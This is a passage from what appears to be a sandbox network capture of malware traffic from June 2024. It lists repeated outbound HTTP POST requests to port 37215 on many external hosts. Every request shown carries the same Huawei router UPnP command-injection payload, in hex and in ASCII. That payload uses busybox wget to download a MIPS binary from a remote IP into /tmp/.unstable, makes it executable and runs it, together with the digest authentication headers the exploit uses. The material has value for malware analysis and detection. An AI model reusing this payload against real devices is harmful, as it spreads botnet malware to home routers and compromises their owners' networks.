20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            234192.168.2.134561641.124.122.6937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.180723906 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            235192.168.2.134894841.116.99.19637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.181484938 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            236192.168.2.1334830197.26.246.15337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.182265043 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            237192.168.2.135352841.9.80.18337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.183026075 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            238192.168.2.1350966156.110.2.11037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.183831930 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            239192.168.2.135999841.122.109.4237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.184598923 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            240192.168.2.136022041.94.153.11237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.185348988 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            241192.168.2.1353280156.226.178.2137215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.186101913 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            242192.168.2.133339641.55.41.17837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.186850071 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            243192.168.2.1346806197.214.46.20037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.187604904 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            244192.168.2.1344576197.152.159.1037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:00.188379049 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
